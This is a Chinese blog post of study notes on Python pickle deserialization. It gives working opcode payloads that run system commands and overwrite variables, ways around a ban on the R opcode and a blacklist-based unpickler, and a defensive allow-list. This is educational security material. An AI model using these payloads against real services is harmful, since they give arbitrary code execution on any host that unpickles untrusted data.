pickle反序列化简析

已于 2022-06-16 14:13:16 修改
阅读量515 收藏 1
点赞数 1
分类专栏: 笔记 文章标签: python 开发语言
于 2022-06-15 22:08:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45805993/article/details/125304742
版权
本文详细探讨了Python pickle的底层指令与恶意操作,包括覆盖变量、利用os.system执行命令、构建对象的__setstate__方法进行远程代码执行(RCE)。通过实例展示了如何构造opcode来绕过限制,以及在实际场景中的应用和安全防范措施。
摘要由CSDN通过智能技术生成

v0

执行whoami/calc

pickle.loads(b"""cos
system
(S'calc'
tR.""")
#对应os.system("calc")
pickle.loads(b"""c__builtin__
getattr
(c__builtin__
__import__
(S'os'
tRS'system'
tR(S'whoami'
tR.""")
#对应getattr(import("os"),"system")("whoami")

变量覆盖
覆盖非全局变量,dict型

secrret={"admin":123}
pickle.loads(b"""c__builtin__
getattr
(c__main__
secrret
S'update'
tR((S'admin'
I100
dtR.
""")
print(secrret)
#对应getattr(secrret,"update")({'admin':100})

覆盖全局变量,str型

#secret.py
secret= "aaaaa"
#main.py
pickle.loads(b"""c__main__
secret
(S'secret'
S'ccccc'
db.""")
print(secret.secret)

简单归纳一下常用的opcode

c+module+\n+name 引入某个模块下某个属性
R__reduce__用来执行函数
(MARK,标志d t l的开头
d t l闭合直到最近的MARK的dict tuple list
) ] }入栈一个空t l d
I int+值
Sstr+值
b用栈中第一个元素给第二元素赋值(和入栈顺序相反)
u 寻找栈中的上一个MARK,组合之间的数据(数据必须有偶数个,即呈key-value对)并全部添加或更新到该MARK之前的一个元素(必须为字典)中
a 将栈的第一个元素append到第二个元素(列表)中
.结束标志

v3

pickle3版本的opcode(指令码)示例:

b’\x80\x03X\x04\x00\x00\x00abcdq\x00.’ ​
\x80:协议头声明
\x03:协议版本
\x04\x00\x00\x00:数据长度:4
abcd:数据
q:储存栈顶的字符串长度:一个字节(即\x00)
\x00:栈顶位置
.:数据截止

v4

#secret.py
KEY = 'aaaaa'


class User:
    def __init__(self):
        self.msg = None
        self.password = None

    pass

#main.py
import pickle
import secret

print(pickle.dumps((secret.User())))
pickle.loads(b'\x80\x04\x95.\x00\x00\x00\x00\x00\x00\x00\x8c\x06secret\x94\x8c\x04User\x94\x93\x94)\x81\x94}\x94(\x8c\x03msg\x94\x8c\x06secret\x94\x8c\x03KEY\x94\x93\x94\x8c\x08password\x94Nub.')

\8c\xx+字符串,xx为长度
\x94将前面的数据存入内存,可以看做是一段的结束
\x93使用栈顶两个元素,获取module.name
\x81新建对象

禁止R

使用i o执行命令
o 寻找栈中的上一个MARK,以之间的第一个数据(必须为函数)为callable,第二个到第n个数据为参数,执行该函数(或实例化一个对象
i 相当于c和o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象)

import pickle

pickle.loads(b"""(S'whoami'
ios
system
.
""")

pickle.loads(b"""(cos
system
S'whoami'
o.
""")

使用build指令

通过BUILD指令与C指令的结合,我们可以把一个对象改写为os.system或其他函数
假设某个类原先没有__setstate__方法,我们可以利用{‘__setstate__’: os.system}来BUILE这个对象
BUILD指令执行时,因为没有__setstate__方法,所以就执行update,这个对象的_setstate__方法就改为了我们指定的os.system
接下来利用"ls /"来再次BUILD这个对象,则会执行setstate(“ls /”),而此时__setstate__已经被我们设置为os.system,因此实现RCE.

import pickle


class user():
    def __init__(self):
        pass

pickle.loads(b"c__main__\nuser\n)\x81}(S'__setstate__'\ncos\nsystem\nub.")
pickle.loads(b"c__main__\nuser\n)\x81}(S'__setstate__'\ncos\nsystem\nubVcalc\nb.")

\x81用于创建新对象

find_class

设置find_class可以限制被反序列化的类
例如

safe_builtins = {'range','complex','set','frozenset','slice',}

class RestrictedUnpickler(pickle.Unpickler):

    def find_class(self, module, name):
        # Only allow safe classes from builtins.
        if module == "builtins" and name in safe_builtins:
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %(module, name))

pker工具

https://github.com/eddieivan01/pker

注意

windows和linux下pickle序列化结果格式不同

Code Breaking picklecode

这里只研究反序列化的部分

import pickle
import io
import builtins

__all__ = ('PickleSerializer', )


class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit'}

    def find_class(self, module, name):
        # Only allow safe classes from builtins.
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        # Forbid everything else.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
                                     (module, name))


class PickleSerializer():
    def dumps(self, obj):
        return pickle.dumps(obj)

    def loads(self, data):
        try:
            if isinstance(data, str):
                raise TypeError("Can't load pickle from unicode string")
            file = io.BytesIO(data)
            return RestrictedUnpickler(file,
                              encoding='ASCII', errors='strict').load()
        except Exception as e:
            return {}

可以看到getattr没有被限制,所以可以构造builtins.getattr执行函数
因为不能执行eval,我们可以通过builtins.getattr(builtins, 'eval')(os.system('calc'))来获取eval函数并执行命令
所以这里唯一的问题就是如何得到builtins对象——我们可以通过globals()从上下文中获得
因为builtins.globals()是dict类型
我们通过print(builtins.globals().get("builtins"))
builtins.dict.get(builtins.globals(),'builtins')可得到builtins对象
以getattr的形式调用为print(builtins.getattr(dict,"get")(builtins.globals(),'builtins'))
写成opcode为

b'''cbuiltins
getattr
(cbuiltins
dict
S'get'
tR(cbuiltins
globals
(tRS'builtins'
tRp1
.'''

最后将得到的结果通过p1存入memo
完整的执行命令opcode:

b'''cbuiltins
getattr
(cbuiltins
dict
S'get'
tR(cbuiltins
globals
(tRS'builtins'
tRp1
cbuiltins
getattr
(g1
S'eval'
tR(S'__import__("os").system("calc")'
tR.
'''
ByNotD0g
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[ vulhub漏洞复现篇 ] Celery <4.0 Redis未授权访问+Pickle反序列化利用
qq_51577576的博客
10-04 1682
[ vulhub漏洞复现篇 ] Celery <4.0 Redis未授权访问+Pickle反序列化利用 Celery < 4.0版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在未授权访问问题时,可利用Pickle反序列化漏洞执行任意代码。这里我们使用redis的队列服务
PySpark tutorial 学习笔记6——Serializers
daisy的博客
07-25 497
Serializers Serializers用于Apache Spark的性能调优。 通过网络发送或写入磁盘或持久存储在内存中的所有数据都应该序列化. PySpark支持用于性能调优的自定义序列化程序。 PySpark支持以下两个序列化程序 -  MarshalSerializer 使用Python的Marshal Serializer序列化对象。 此序列化程序比PickleSeriali...
Python pickle 反序列化详解
m0_65129142的博客
12-16 3018
什么是Python反序列化 python反序列化和php反序列化类似(还没接触过java。。),相当于把程序运行时产生的变量,字典,对象实例等变换成字符串形式存储起来,以便后续调用,恢复保存前的状态 python反序列化的库主要有两个,pickle和cPickle,这俩除了运行效率上有区别外,其他没啥区别 pickle的常用方法有 import pickle a_list = [‘a’,‘b’,‘c’] pickle构造出的字符串,有很多个版本。在dumps或loads时,可以用Protocol参数指定协
pickle反序列化
rev1ve的博客
12-22 1569
与PHP类似,python也有序列化功能以长期储存内存中的数据。picklepython下的序列化与反序列化包。python有另一个更原始的序列化包marshal,现在开发时一般使用pickle。与json相比,pickle以二进制储存,不易人工阅读;json可以跨语言,而picklePython专用的;pickle能表示python几乎所有的类型(包括自定义类型),json只能表示一部分内置类型且不能表示自定义类型。
浅谈Python Pickle反序列化
YJ_12340的博客
11-11 839
序列化说白了就是将对象转换成字节流,便于保存在内存、文件或者是数据库中;反序列化则是序列化的逆过程,将字节流还原成对象。
关于Pickle反序列化总结
桃雾雨Rain的博客
01-18 1924
1.Pickle反序列化 (1)pickle.dump(obj,file[,protocol]) 序列化对象,并将结果数据流写入到文件对象中,protocol可选择模式,默认为0,文本形式序列化,还可以是1或2,二进制形式序列化。 注:pickle.dumps()将对象obj对象序列化并返回一个byte对象 (2)pickle.load(file) 反序列化对象。注意要让python找到类的定义,否则报错。 注:pickle.loads(),从字节对象中读取被封装的对象 简单示例:...
序列化和反序列化pickle
兰枫
05-03 1666
序列化和反序列化 目录结构序列化和反序列化定义pickle库简单综合示例类的序列化和反序列化总结序列化的应用 序列化:按照某种规则,把内存中数据保存到文件中。 文件时一个字节序列,所以必须把数据转换成字节序列,输出到文件。 反序列化:从文件的字节序列恢复到内存并且还原原来的类型。 定义 serialization 序列化,将内存中对象存储下来,把他变成一个个字节。->二进制 de...
pickle序列化与反序列化
u012279165的博客
09-02 376
cpickle(python3改名为pickle) Pickle模块将任意一个Python对象转换成一系统字节的这个操作过程叫做串行化对象。load()反序列化 dump()序列化#注意顺序我们把变量从内存中变成可存储或传输的过程称之为序列化,在Python中叫pickling(其他语言中被称为serialization,marshalling,flattening)pickle.dump(obj
Python使用pickle进行序列化和反序列化的示例代码
09-24
Pythonpickle库是一个强大的工具,用于对象的序列化和反序列化。序列化是将Python对象转换为字节流的过程,而反序列化则是将字节流恢复为原来的Python对象。这个过程允许我们将复杂的对象结构保存到文件或通过网络...
Celery 4.0 Redis未授权访问+Pickle反序列化利用(celery3_redis_unauth)POC
09-29
Celery 4.0 Redis未授权访问+Pickle反序列化利用(celery3_redis_unauth)exploit Celery 版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在未授权访问问题...
Python3.5 Json与pickle实现数据序列化与反序列化操作示例
09-19
PicklePython的内置序列化库,它可以将任意复杂的Python对象序列化为二进制流,也可以将二进制流反序列化为原来的Python对象。Pickle序列化的数据格式是Python特有的,不能跨语言使用。 - 序列化:`pickle.dumps...
json模块和pickle模块序列化
weixin_30483495的博客
07-06 61
什么是序列化? 我们把对象(变量)从内存中变成可存储或传输的过程称之为序列化,在Python中叫pickling,在其他语言中也被称之为serialization,marshalling,flattening等等,都是一个意思 为什么要序列化? 1:持久保存状态 需知一个软件/程序的执行就在处理一系列状态的变化,在编程语言中,'状态'会以各种各样有结构的数据类型(也可简单的理解为变量)的形...
python-pickle 序列化和反序列化
m0_59236602的博客
02-02 718
我们学习Python必然是为了找到高薪的工作,下面这些面试题是来自阿里、腾讯、字节等一线互联网大厂最新的面试资料,并且有阿里大佬给出了权威的解答,刷完这一套面试资料相信大家都能找到满意的工作。pickle.loads()方法跟pickle.load()方法的区别在于,pickle.loads()方法是直接从bytes对象中读取序列化的信息,而非从文件中读取。Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
pickle 序列化与反序列化
u010454261的博客
12-27 381
废话不多说,直接上代码 import pickle class Person: def __init__(self, name, age, job): self.name = name self.age = age self.job = job def work(self): print(self.name) ...
Pythonpickle序列化与反序列化
BBJG_001的博客
03-10 2089
原文地址 序列化/反序列化 将对象转换为可通过网络传输或可以存储到本地磁盘的数据格式(如:XML、JSON或特定格式的字节串)的过程称为序列化;反之,则称为反序列化 pickle pickle模块实现了用于对Python对象结构进行 序列化 和 反序列化 的二进制协议,与json模块不同的是pickle模块序列化和反序列化的过程分别叫做 pickling 和 unpickling: pi...
[代码笔记] pythonpickle序列化与反序列化
这不是博客
12-20 491
#!/usr/bin/python3 #文件名:demo_pickle.pyimport pprint,pickle#导入pickle和pprint模块me={'name':'Guddqs','age':19,'sex':'男'}#定义一个数据output=open('pickle.dat','wb')#准备一个文件写入pickle.dump(me,output)#先写入一个dictpickle.d
pickle数据序列化和反序列化
最新发布
fakerth的博客
03-23 770
本地序列化的情况,应用较少。一般来说,大多数应用场景在网络中,将数据序列化后通过网络传输到远程结点,远程服务器上的服务接受到数据后进行反序列化,就可以使用了。但是,需要注意的是,远端接受端反序列化时必须有对应的数据类型,否则就会报错,尤其是自定义类,必须远程存在。目前,大多数项目都不是单机,不是单服务,需要通过网络将数据传送到其他结点上,这就需要大量的序列化,反序列化
pickle的序列化和反序列化介绍
baidu_15113429的博客
11-07 461
学习链接 学习链接2 #-*-coding:utf8-*- import pickle class testdump: def __init__(self,id,name): self.id=id self.name=name def __dict__(self): return {'id':self.id,'name':self.name} test=testdump("1...
Python Pickle反序列化漏洞
Lemon's blog
11-15 4650
前言: 刷题的时候做了一道[CISCN2019]ikun的题目,提示考察的知识点是Python Pickle,之前接触的都是有关PHP反序列化,这次就来好好学习一下Python Pickle反序列化漏洞。 基础知识 0x00:Pickle库及函数 picklepython语言的一个标准模块,实现了基本的数据序列化和反序列化pickle模块是以二进制的形式序列化后保存到文件中(保存文件的后缀为.pkl),不能直接打开进行预览。 函数 说明 dumps 对象反序列化为bytes对象
Python Pickle反序列化
09-15
Python中的pickle模块实现了对Python对象结构的二进制序列化和反序列化。通过pickle,我们可以将Python对象转换为字节流,然后将其保存到文件或发送给其他程序使用。反序列化是将这些字节流重新转换为Python对象的过程。 要进行反序列化,我们首先需要打开保存对象的文件,然后使用pickle.load()函数从文件中加载字节流,并将其转换为Python对象。以下是一个简单的例子: ```python import pickle # 打开保存对象的文件 with open('data.pickle', 'rb') as f: # 从文件中加载字节流并反序列化Python对象 data = pickle.load(f) # 使用反序列化后的Python对象进行操作 print(data) ``` 在上面的代码中,我们使用pickle.load()函数从名为"data.pickle"的文件中加载字节流,并将其转换为Python对象。然后,我们可以对这个对象进行进一步的操作。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值